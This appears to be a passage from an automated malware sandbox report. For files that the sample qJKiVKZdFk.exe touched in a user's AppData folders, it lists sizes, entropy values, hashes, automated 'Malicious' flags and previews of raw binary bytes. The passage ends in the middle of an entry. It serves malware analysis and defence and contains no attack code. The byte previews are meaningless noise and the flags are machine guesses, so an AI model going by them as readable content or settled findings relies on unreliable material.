                                                                                                                                      Preview:...?.^........\8.=.".Y.@.....?.}........V.=4.....<..r..%.../.....I.S.o...$!...-4.IY....m.yq...T.b;.I..ye...L'.....Y..d..J..."..c..4&....p.q.'Kj..]~x.#C.5.`..o.s."..l/......4s8....ao.d....P./......`KK..........G.....5#.H....t..Q.....B..3..7.o....{...@?'.6..../E....M?..y/PL..em/..#]...pY..S3....A..........E..\.e.$>s:8.j45...2..9..B.!..v..b.Y6..< .L8Dy...C.......fT..>..8...4...&+.O......nO5.....7..]f.........x......8.....F*z.G..u.#...X..<.X.}.0...=....%.zXH..R.e.5R...i:.....(...._..,..;..&.@...(c.k..mHO.)E..$F.av.~ .x..8.Ygp...yL.jO...a.....%..@,.v.I.. zj.M..W.*i...;...<...t..k=..\..qf.......=.3......=i.,....O.ir..tS%K."..v..B....2..Q;_.6......b?.T.T.9....^`~.)...q.B..q\...I3.......*O....x........L...!=p.....+.....|..r.......zo...I..q...!.)&...g......TUN.0a.N.H..^'3.y<...."..z..........\..y.......Q.).,...R8.L_}.?..jq?.....2K..e$.V>..Ggf..>.6t.G.m.M.fB4..b...}..{..aN.k..A.e_.......r.....'..$p..:...L|...>.&..K.y......wI.n.W)H....r.R.D..

                                                                                                                                      C:\Users\jones\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6707429395122255
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:3u/GWLPPfZwHZdggK843ZCzfiCHut2OvXCEsVqiWOzu/yz:e/GWL3fe5fu3ZCLVutvXXs0iWnyz
                                                                                                                                      MD5:124AA23FD7587C4F731A19A03F649788
                                                                                                                                      SHA1:BA86D70DD9EC11EFE4895BC04BB0335788EC6233
                                                                                                                                      SHA-256:8B7EB6B310995D59E37297B2680142E6FC40B8D4A42FD8DB3FB69A5FF1382085
                                                                                                                                      SHA-512:39E8DC4882441FC115E766238BAC0B6F9560811A7996228067C6EEAD2D401B5D890063AD486394A5E9AE858EB1CF064ECAD16A3A66670EEE48F36EF2CFD15F9A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......[.x..CWWV...Pa.p./K..a~\{fXG........u1P.....{....F..r..g\/7.(}..:.;...o.:~....<".R.....ip'...@@.....,g..l..YI.*-..Jj.?K.Jcf...]...DN.H>.H&>..Q.9Y..E7.v~.F.y.........gm.O.:..5<S.`"..\..tB..^..s.].h.q3..;4,[....B..X..+.2....K...y.N.0.)..i.......P...n.Z...Rk....Q+.+.KS.)r\.E...#.H...6...I[&,t...Wz.1...t....PW.i/.sG....yy...c^.(.(.......k?!.6...Sl..h=5.60..k...".).%...0.?.rB.....@\D.....9w..8...Z...e.q...D..\.......Kk.M^.M!;M....S.~...+.......<....Z..|......H.}R.oo.>.Y..D-.D.*.F..I...-~.,.3n........y...S.:.....I.4m..}M8.$.x63...;......Y_@.#....T.5.........2N..^.L9...E..E.e....Y.n1m7...[.zN.n..X....O.Wl..+\.....D.....k.......t.B........B.O3..D...YA.(L.^.f..bSf.w..l._....Z.."0......7.cn..p2.)S/W$..*F7.^.!.i.6.....1..5....T.S.E..`.6.G,..~......v.tq...VW%..urY...'.y.<.....H0...b..?.O...#..0'O...;P.....{.+6.?Q. ...J.4.>...!...1...`..m.-(..YW..e.1.d..._...;.h@..1.n......,z#-.Lw....u{E.Z..........y x..c.....@.!;(t3.......n....\..Rq.$......'....

                                                                                                                                      C:\Users\jones\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6706511526126343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:zSGjBrIm/lmAP3csMC0rCXXIryiIaN30gzWm:+AcmdmSvMrCnunIaN30gzB
                                                                                                                                      MD5:11AD5CE96E9565D55EE2472DC638DBBF
                                                                                                                                      SHA1:3B2E4F87559ABA518A2C00E85FB07A398A0D121C
                                                                                                                                      SHA-256:1AE9959A4391D11E289E84CE1FBBC9AA3FB75326BDBB50DA54B9BB817F10D575
                                                                                                                                      SHA-512:5C1623BEA1A0632987588FF96B15DA045BE6804C0B7D186DF7C5DED05F0897F94C3A25D89C3FEDA9C7AA568CAEB39329BECC2B3343021976307FB18F05DB62B7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......_&.Sl\.E..[a..a...gqb..#.:..;j&|.!.p...a...-.&.?/4 .Y)$.J..`F.x...77....%.....-*i....[...K.v....P."..2.2..E..P.7.K.`.&....).S.[......i W.%.9n4..+......B.\. .....)B.....y....8.>m1.4.~....wz..v.+........a.hU.,...0..a07N a.R........[_.2?6g.[..J.N..>..M}...b.....Le.....g..U.&.....R.K...i..H....o.^......Bb..;.3..d..e..f.h......[....R..d_.5.g..%M6.....&%.f.X.0p7.'...6...c.....+;..U.4.{....;tL..+..+.$..$6.....\....tbJ.:5(..Ga..ER..I".qS.8..`.q...+...6..... ..AG..kQ.*.Cb..y....2.JU@.D.yCJ..X..P(JW.>.1....r.......x.8!..B...........j.2.C......@.....5.....!Df.K@..[.....5..[.ZcL+.5..D_...+.t.$a:.D.V.p.gi.......&....O1.-...L......}..2....<..1.Y...k...c...Ny...f.&..K.I..>X...V...i]._+.eM@..2a&sV...%.baiCw.oC.j.f._....3z..r...,..K...w.....&..S..V..`.a.G....Y.$X..sUe....q..6..........5.EP...e70Cdo.._...!?.j.>.8....J7.q..l....j.3.u....Cc&...n...k.....i.Er.f.w.fm;V.G..^./p..)=q5./...'..).mK..^.....d..XlsDS..7..*..Vj..|....l{/.....K.i....m1.../.

                                                                                                                                      C:\Users\jones\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6704926169453153
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:EqYdnauviBh82qvVHC89A5QWVyQLJL8gfkox1FgeyHFgJT:piaus5uVHH6GkdlL8gcox1FTT
                                                                                                                                      MD5:A6BA3D5F26AA198013805A5D3B9AE23A
                                                                                                                                      SHA1:EF856496FB5665FF4B811BF1CE4BE1814A81D109
                                                                                                                                      SHA-256:A8F9D6F298324A60D61C3F2E9D28F79E01C22BF792EB86133C8CC0263EE020E0
                                                                                                                                      SHA-512:EFA098F4C6DD2C54B0BAA6B4F48D83EEF04E7E46F61F2426C81F25676897C3AFA34FC125115A664E6A17D2829A960862C49FE2F1C53252F01369D2B7C228237F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......!.T.&.`]m...F.Z....|.K.$.\.....c>-6hB..Z2Ya..v/..$.c.......k...=.CT?..gn.x..a..[8~....P).......U..p<..O.U..s..'....z,.t{..Hz.[zNk...S.~`.!$.s...2.......w..Mc:{..J.v.D...[@$......X.p...z.4`T.S.l....zd.z.Pr.0..U.M.../n.<.....JTFr....M.... .)...r..6......xY>k..3..0."...h ..\.1.7<.:^_.StP2.?..(46.....TIe.Np.U*..m:...b.(....$.........j$.XB.j..S...eD.....LS....Q*|..q...'.b.}..\.t..+.|{.S1.............&.4.m...4c..l...p...`D.>F.G...St.c..1......2l....D..W.8....w.C_0.k.;3...g.;..S.......%3eF.v....tW..8f....^......F./O.]..o.@a0...T....N..Bv@.u\...F0..{...&.v......3@<.`.^.M.K.~..^.3..........7..R.jbQ+..6.B..k|....<.)4.rg.....z.A...A..yu.X.z....Ta.'...2...;.J.6.r...d....X.......b.t....'2.._.\u..E..5A.kZ.9G..s...........Q...q..b...a../._......)=..1..M.IEv.".v.....l.._Z...]..L...).\{.G..=T<....&.:c.....5.qy.e.). ..pd....^..7@D.>.Q.X...}l.9...$-......|.b.%..K.!.......R4...L.<dxJ[.n..=o.<.O.I...cd..+.`1.3..F.:+.....Wf..t4"'._.-_.{.....

                                                                                                                                      C:\Users\jones\AppData\Local\Comms\UnistoreDB\store.jfm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.989544658853998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:5ngv3OugI0ogPJMaqFun6bTG80pazOK9rr6CM7lgpRdB:5ngvk9jhKunMG80urpagpRdB
                                                                                                                                      MD5:D2D1B3B4324C89478C8A7F36EE9068FD
                                                                                                                                      SHA1:7EF799028AAB6840D50FDAE55039B0A385188681
                                                                                                                                      SHA-256:CC0E0C485F214811C045522531C5250FC768322F36CFDD4F79E4C21EE55947ED
                                                                                                                                      SHA-512:5BE55B84502006A7B80C0CB08FC1C00624C69569CD9C747CA5F28B037EB367FC552EFF596B1CE4DC78D9A9BFE88F05221D99C4605D231A193D64CD331F1219C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..(..#..TDPF.2P.*..'.5.C....^..Zw),$,.u0~....kK..M,K...f.<[..F..k.sR.J....O..n".]..Bs..A.S|..t..u3-.`R7.5..!.(73......Sx..-....0.cH....%.&/.NM&;.5..l...*(..m.j..a.1.b..n...01.....Ze8....=.s.rWP..B...O5..p....Se4O#..[.2...u.......d=..P...(F.....Yg.NN..&..?._.....`h..v.@ibT..Dj%.._sIqW,<..m.<I.'j....a!vw.4...._...........N...i[....=.-..P.^..@P..N..d.H.`...s]..d.....|...:A;.F+.........Q..h..]>"..m..wS.v.=,pBJ+I.7.n...s......I..&.m......ww....nO......2..4P....l..;......c...q+j....R._.L.~>...y...K8..j...(....w...=8w.A......y.... .I.K.....i..2.]........u.......c.Z.Q..R..|.{V.....h.I&....Wf...mD.......P<Ch.b..^R..$.....M..A.V.N^j{.H.Z|..I\X.o...)P.f.Q..z..m..h.r.q.z...{k..A.O.EipVU<O.....\....q..m..W?......Ak.)x.%..?YH.g...\%.<....C.H.......3.:H...@...E...g'%..Lx!.7..tN ...-.N{$....%..@...gk5.}./..< aAJ. .J.......U&!tz....e..#..~m.[......`9..&........$.>.....Q.!...SL.U..b,......U.r..^O..p.......w..i/...[..BL...%.T.\ci...%'..:.,.z...........;.V>D5w..V

                                                                                                                                      C:\Users\jones\AppData\Local\Comms\UnistoreDB\store.vol

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6291790
                                                                                                                                      Entropy (8bit):0.700853856400524
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:9uBDLOFFMNzpw79A5RdFsgYLjfoy0ysEGSa+d+gOrOuWxWk3m+cun4CfYjUfSUXC:9uF95RdFsNf4yvLR3b0T
                                                                                                                                      MD5:28BC6866E3A7E7273177F855983AB3D0
                                                                                                                                      SHA1:7C6FD77A6749EC625AF393FB1B7D9F94AF1C558E
                                                                                                                                      SHA-256:FB5F86B6F741032007781385969A162A92217B0AB0C3E1A24175D921388DD235
                                                                                                                                      SHA-512:4C9639793DE0B97522D6152FF8ECF613F5CAE301ECCA2A906EFD1B83BDEE30DBC1B0FB2D0C12BF519ECE44DC95878EA2E6ECD70ABC0046DECAAD21D3AEF3DD1B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:... .cI2t.EcI......$...e+YI.@..h....K..D.......D.H..%...[./;6k...V..$|.Y{a,....\q....m.c..h.E..a..v..."..9..M..5KA..l.Zwr.....3M.;7.?!..5C...h.}.~G.......Z.d....9.....Q7.._T...|...Gq.Rp..6....i.9.. P2......DG...jNK..dO......=l%.K..x/.=.....\.ruAT{{B..N......L.`.........._}.3.+.^.........Wl%.~w.kI5....d..!..09[.....k:II..&......U..S....L.....l:.O.....q.g.mV6y...H<.,.....o...Qu.xU..).........S...<.2.G....I.v.1@.m.7......hI....[=2.te.j....F..Q...4......4..D."..Y.....K....S....2........~.S.n0...'^.Z.d.U.........`O.}ci.2...!].7h..h.....G.....>..d.\...y..8.zh%.i/..+N.EGUAFq.sE'[..7.S.. .Q......iN.4.FG..."...'.......M.. .....LsB2-..C....(.t...L.......O.....F....'h.nc.>......4.6@.;.L.q...M.....$.w'..F... ..Ke..go.l.Bg.L...'Lh..K9.,$.).1/=(...../..Ds.. 7L<....J=.I.k...+o*....C....Ao...T).r...P..I. v..E.e.KU.y...Cv.......c..1.O(#.)r?#...V..j.tX..|...*.......X...a.....Y.%'.B.{\..r.^....p.._G...cn.../.`..f3T...^..U.......5.....;C.\kE.^....T...x..

                                                                                                                                      C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1048910
                                                                                                                                      Entropy (8bit):2.6692190431889875
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:HM+3ghasU3rU2XuB9YJNuPy2RKUwNoAPwRmfLvdJ/FhUO5yYU4fxQnafujHNATkA:Hb3gwGB9YJY4N2R+nbbU0fxuv6C8p
                                                                                                                                      MD5:F2A40EEAB955B83A1C981CB7FB4E756A
                                                                                                                                      SHA1:89D9B738B10B6EB3F8B21A11DC333C856714C9D3
                                                                                                                                      SHA-256:5238E80A109132C73A0916DA5D930998771FCDE1ADF762329D221322E62A55F3
                                                                                                                                      SHA-512:12C4D4D174221779EAF795B17181BAF62B48DA337E41C0FB8B33BDA8CF16D1654297378B4BAA5DA2E000FFFFCA174C9F6F5AB9716D6CE15EC209F046428ABED3
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.i:.\\j.......6X!...A.i.;g...al.J...G.r..4...($z.&o.o....L7^1+;.Z.:$....ws...vZa.>8..._X...9/..t=..b.?Mfc.CR..`GJ.1..'.X....;.e.....mN.r.Py.......a.=..D..(...V5.G..g...x..........9yc..|..da.W|D4.s.d....?..@..;....."i.m.t.:5..u{.?..oJ............/...Q.K,.1.u.gW|.V..q8.IN.=.ls*X.5D.,G.$..+o~.....u.V.|Y................}7.>G.1.?..pQ...P..,.li.L.<>.......|..j..R.~.....2.a....F..G>.z`.1..D.@.$.p...E....<..d..%Z%.h.a..?...f3=.......b.vf.=.N_..N......O...C7.8..d.....RK..........p:!.=...+y...2>...6...0....A..R...7..8.{..{.9....#.0....&r...P6...t.N..2......~..i^`.&..m....v.GVdQ.W_W..f...}n..,K...c.s.=....._.0.....O...$...W.6..$...b.4Z..1~..4BzI... x...6sn..J}....e0|...O..2.r...q.R..A>.......r.".....v.-0..[..4......isz3S..n....r_.^.5|u-.2R..O...[?...zm.wyR..e..6.;.. .....&s."y..........=o.......U..^A6`N....4..].*~........9.F.,../C.Q:|.T..X..6....g..w....a,.[l...~...L.5...j.#...ll..b)r.w......P9.....-!.F..Y.2h...b4.>...l.<..g..

                                                                                                                                      C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.9937078680550915
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:PN2o6GbvZQpPB3sYpRRlrJBMXPPIGXew/hA:IoDvC1R3JBWIGXewJA
                                                                                                                                      MD5:45BB56320F56404F8921288433FD6090
                                                                                                                                      SHA1:87C9F1268C04911239DAF4C37D552BB712B6F0F2
                                                                                                                                      SHA-256:6511EB7C3CEE2E885D37CC231D53F4B3724FB038DFED3C746E182D70A0E5EA0B
                                                                                                                                      SHA-512:41F89C1F093D3AC67E0E82C9AA3D5459640B7AFA80D2E99DA21FA378DE41B60219D7B83C6CCB1F2B2CC015E5D4D98204D6855D99221C758AF0FE00ACD37AAE30
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-..|5.0...A.._.............IZ.=S......!M...I.V].)pi.7....9y...}&%....:b."...>.'..}*.......>.)......E`..<42h....`.m..f.uUE-f&1.G.Z.j..<./.|..}d.5....DLo....=,.....b...A'...].........v.D4..X4.hy.7....K..`Y..Bf..,..;..?.Y............ .......Jwf%..A..".}.._L4`P..?..~...L.U.f..4.j4...q....9...w....N1.x..m1Vl.6....U...+S...t..I...9..+...Q.q...s...`/-}..cU..|.`...9-.....\....S....-o+..}.m9...or......&..."_..\...V..."4..Sa........`......~...h.M.y>DR$..i.+...}1.........,>.(.I.n.....g./...>F.O..'+F.T...[.!yD]o..k..V...Mn........r.Ez9..X..F.....2....>4m....G5C.4g..1....u..../.....^...iC..Zg..-...%.1.f.4..T...]cg2.zD..T..=.....e.Sb;.0.P`n#i.....L..w..G..F.]s....V.u`...0......JSI.4....h..<V.Q.b.y.e...RT..SS..O.a.....{....h...&.5!wHk..Q.d..f.......@..."...g.P....n.t..|WpD_.bz.}H...3..W...p....r.:.N. !...v.[..p....u...6..%y\0D.b/o~.1a...z..sF.....{g).....Y...=.7./.H..'.....>..C.G".c..-).>D.'../.....*....# ..AZ.V.PG.m..3...!.`n..*].mK.@No..L............

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-651BFFE6-228.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.8490234194960707
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:bn3MkkQ7Mc+UR7jW77NYqasF4f2pVVO+4aHPaD0AX043:gAMeEYf25Cku
                                                                                                                                      MD5:64255CD3F4138FA6B00ABACDB202A9C3
                                                                                                                                      SHA1:7E9E78A339E3D8D602A503FE4A5306329BA588E2
                                                                                                                                      SHA-256:3D7CB101F118752E90A26F0D532617B7FFA16FD28BA84809C3A8BDAAC5CBDFD8
                                                                                                                                      SHA-512:1A5496EEE98AA4A1E1FDDE8C246C5AD83862A0EAF618E0457CDADE95D918A7F4CA5E3E765B573607D9C8ED017642EFDC1D77EAA28D24287E0733ECACC0A9C360
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.Fc"....$...(Iaa.'..s .}p........\1.[.......e..._3[....2....|.R.#g..>.s....X.I..S.@?)I.k....U!.3d..4.1...z...*.Si.....h_..e....2..pb4......j..o{........zh..h....5mZ.f2.....?.c....ie..'..% ..*..8+.r{..~.....!.1'....ZS.M..........G.}._b.UR.n.{l.U.".\...3.`..av.w..Q^N.n.]B......i.y%.....cs...Rn.*.y..'.lcaP..l..]c......G;T...^{o.G......&.k..Y@.K.&...~l.V.l#OM..[.h7.......[..LP..RRD.R..R.A.{<.H#..d..~q#M0/K./-t.".v.K..4.:IM.2..=...\.X..q.4).gG....TG4.+.......te..?[.o...\.6..9A.\b....<U.....M..u...e...rz?..2S).....XZ.n...s:X.t.U...I..uK.....SI.Ix^^..I.......7/+.[.a...;.7....5.tl...... ..Uj.."AL]M>}...0i.X..G.+..^f.......id.........x./xJ.q..+..-.h.d?C....`.............c..C..?.1.Z(.!.."......j.f..p.Rq./h...V....[...w6oO...%....Vv..Q.8P.q:..0..n"'.rJ.I..<....mO..M9...$......wu.....P*.8..I....UZ.r.d...T....V..\.-II..Z./....q..P.........VB.&.q?..VZ...60.=....Q...-A...H..>q..}.|.....%.v.&`l..4B...H.....N..!.2...U.l.B..i9O.3..c..]..q.:`...z.}~....j...

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-651BFFFF-BD8.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.6756212801514745
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:Sms10k6YQmdjMv8RNq7gqulp+WgCnWtedXsaaHQ+h:SmsmkNQmdjMv8RNsg3laCaf
                                                                                                                                      MD5:D69B9F76E95C9FEA2546F5B9191FAC05
                                                                                                                                      SHA1:BBCCABCCCC74BD45B2EB1A0A4E14763BCCC5DEA9
                                                                                                                                      SHA-256:44A007532899C968AFB0F492BBF4545E834E0860AE4856D184A492D4AFA1DEFE
                                                                                                                                      SHA-512:62847CBE18DA901AE9DD87A269009E586D18C25585A6B82E315E54997842D342016E07D927A77B702A372608EA97BFB1B504487001C5BBC76FCEC2FB1564AFF6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@..rT.YQ.1|..8.-c.....1~G..B.P.<V...k.[.U...D.....l..UurJU...4a.B.w..&A1.0...>G..LW.zf@Db.%'..i..y.>E.k..Y...% ...;...;j.|f7.%u9......GL....!....^...+.~.~c7D...;..}.%.L8.Vq..g.=z...5.~....6-..E..........zH.YIBu....@.E.uG.&.......GH...G..y....z`.\~sX8..}qO..(..&.t,...T[.....)..'.o.}D.$.....q.....:>.z._..].M.....b..Y.B.n.-.im.l.ylRg....,(..z....5-..|..gV..P..t..+.OZ......I.'.ii..(..3.@4.........(.A....Q.7MR.c.>.xxan.rs.2:7....u...&.V...;.y..0e.....-m2/R.s..CL+...S4..40...}...........l..0..{K.....`..Z'..2......j.U...X.b...9Y}H.3"..b.r.e}.i.5)..q^.<.MBZz.)...?%xb......g...M.q!sn..+.p.sq._.X@.......z.o...n.........\.'_....6c..`.*.a+......S..^..M=....C....1.....$.........N.|uSj..B....Y..!...f..%.;.N...5..x./A..G...a.RY..f.3..;{-.@ql....,K.|..].......%.ECe..vt.|N..lN.#.+.<..2..t.M...j^u.......b.....N........g..|..D.x...+Rev.)........N..xl..vgb...}..Q.P.;..yy.m..'RP_.v.5m......vV...o.dsH<C...v.n..[3.c.....H...../..h...oH..K..IYP4.\.....m.[...g%u.X.

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-651C0414-22F8.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.6791006333419747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LH+jBTXA+d4eE/KKBPksd8b5KEpf390EevNYRR:bqBTQ+d4eE/RcyG7MNY7
                                                                                                                                      MD5:16EB08E7546D246D5E64D21259BD27F3
                                                                                                                                      SHA1:5B71905884CC9777308CA80BD029F1820393EB38
                                                                                                                                      SHA-256:2369D12525612C91BAA2113CF0088B310C8391EA7AA7B7190195B6BF13039B34
                                                                                                                                      SHA-512:97355881F9D953569F524FB64FFEA35EF1820C829F4394EA2EAA9A3B0E24D87F26862FD9A2B2F53D22E05D109F40EAF28E4C71DAF99754F05E5786E4FF549FD5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@...g...ZV...aF.....\,...4.l..s..X.kQ{.>.].*X.-..>.......%..Tr.a1.#H....#..!37.].B..E..2 #6.m...#...9....%.eg.F..-/......xq..u....f.....R......9..v...Z.s.}..7UvyF./.J...x.........;..`)NC>..Q.\.K..k....F../..W|=|.B.{.Z....V.*.p.....-...;.....Py\r}'...X;_%9R.nM.[._._qsv..v.1......2u.NT...C\.X8..b..B..d\....Q..1 .{.....X..F.eC.&.&v.~.j.#.%_M.YF....s.'.........a.!1.b.^%..'..QN.<Q..5X0<..s....0.>Og._..0.x..Y.;...p...F}...W.....Q(%..9...t...H..U1.T.<....... .....@.#&.!2"....4..nt...}..2z1.Z.....\...!.......M...)~.8.YW._3.fr...1.=...U1.#V.....4....1.e.-.u...R>.G?!.4"...nD....6::.u.HGui.u.Bn.Lr.#..gt.F..(.Oa..>..n.a!R..[...d..k.}.|;Pz..L=.T...]..h.v.%.....|..Dk...[..E.8.4....zO@...3.7.u..\e4{.Y~Q.nn.W{{.8..@.=..F.*.O....|.....(....78w...:..c.6..k...(...g.1a..J...."?...1.W...q.07..%t..GG.......vh|1...Q...Lz.......;.&..X.5;v5o.h......t..C.^....\...$.Y6uA..p.... ....]D3P`..HY...H..%.?_<t...c..O..H.S24%........fP.`.eG....1...S0Pw..u....M...

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-651D225D-18BC.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.674474838559571
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:7PJ9p8UxXm5nBvUYw1Y0W9UnHf6i/z4N9nCLnAaq72u/HlXEZq:jTiH5BMYw+4nHiEMN9nf7NHH
                                                                                                                                      MD5:8E8C0245230329C726AB9D23A262B325
                                                                                                                                      SHA1:0BDC8E3114AF923E03AFD16F7E80B0E3C7C8BC0B
                                                                                                                                      SHA-256:605B6E821503576D78C66636363802BAEA288289B0B6365445902DB0D5D78F5C
                                                                                                                                      SHA-512:E2B3AA2FB7BF2D44B1C46AD76ACE87DAD716CF3D533B8C5B24664267338A28C8C28FFA2491720FD1BA0C5B43AD7C179EF006EC8FBFFC4B438ABA963300E38D88
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@....s....E.kq.....Y.a..Qa...0.V}_.#.[V.~...s.0.qq...os..'7......+K.v..FG....@rHB...9.<..e......L...C.U2..qu:.%.......,..N..`.5.%.....2..c6..R N...8.&Mhk.......d..-..Y.Q....C..6hp.BW$/.fz..?..8...<J..b)b..6..I...'....<V...&.\...Q..D...+...%.P...*.R.x.(dJyi..q"#&P..j..wZ.&..X..b........}.2.jrO..|..J..r..L.y.@)BG....b.[5.s..i...F.Q...g'..&%.9.g#......$..~.../.^.."./..j....0...[......Q?aaq......6.....Q<.|R|5T..@Gi..g./..*.......y.., Y...5o..v..3...BE....^.?.@.6.d]q..x...K.H..6ha.;B.14.Bq.(.d..M..[.k..x5%.#......3A.Z...}...kV.B.....I.15.W..<....RB&..g.......OU....:..@.3Mc..p.t...L...*.Y8V$_.po.Sm.F.....s.:.n4!........=..F....`./.0!.3.T.5Q=aS....udpS......... c..<...&@....%.5@...?]...e...C..?..#.....d.;.G.h.......h...$}..#......Vv.#q..4f3....{]....g...6m8 I..?)n......$..[.4R......+.6......q.72.|&....}6.F/'...[.....b...~.,....b...|.2kzH....~.].OH..".k\.j).....K.S..i.....G.C...E7."/..u.'.."zr...T.9,.K..YwUf..%P.X5....t..I........s.r........

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-651D2262-1A18.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.6442701724028393
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:l9pUG+Lr6GWFG+KCGu09Crt7h1U1w1nU1:bpUZmGSGRwvdY
                                                                                                                                      MD5:6F3D36554495D5A5E412D73F6A2964B6
                                                                                                                                      SHA1:D085C6B467ECB8D72C6149CA5000695B91B35914
                                                                                                                                      SHA-256:D17E4DE72FCDBB497925F22971796CF320C0A2D40E2B982C9EFCB3163901D28F
                                                                                                                                      SHA-512:AAA5BA2F561E13EBFDB37212303B0239C65B18FD89C2FC6769FB835B692E3F555DEBE9E082799D86AE1B67256DC18D75C71EC24ADE6217A9BC5C1681C7CDD606
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.....u..4../."8.RE..9by.....!.g..t.(.c>."..q..O...<...<..2<..w.cR....eP6...!Z....b.....l.]0.P.v$..B.59*..:.V..y..gE6.(i..........R>......3J...D..A.....yU.&......[5...M..L.COMD.....7..0.a3..DlmC..7..|..m..R..s..%.sT.v.+.[Jy......Dx..N.1.l.0..0z.-.......X.x..E+..U.A.!n.v.....^....m-....C;^8...M.......PV....s....eT..N.A.m..ij...X....[.6...r.7.ANV.....6....B...B.s]C...M/'*i..B|`........& =.9h%..d.2)..$$.l....:......h8W..K.....;l..5J.;J...C:......@.X4...;..Nh...Yj\.o..g..2@.E..ee.....vX,...B1."w.t...r<.A....Zv..FLY@...}P._...x.....Z.j..h........~....J..q...5........./...`.t.R.C...x..O....8.as..7.l4...U.p. WrM.Zx.;/..ccD.....b}Q.g1v...[...iY....y...........<................_I.^.....i.......j.3.......-.?..,..Ij.I@.8R.w...:.'.m.p...W....$7t.\......H..U...u..EG.........L..F.t.N&.k.n..t......G8......n+..`0.u...!U.M...N@......V..-..!..........U.....=.6..9.h....g..s...i.Q....{~k..R..g. ..B...d^..).....Zt...[(K^aw0G.(.D.h.c=Te..#...<>C.

                                                                                                                                      C:\Users\jones\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
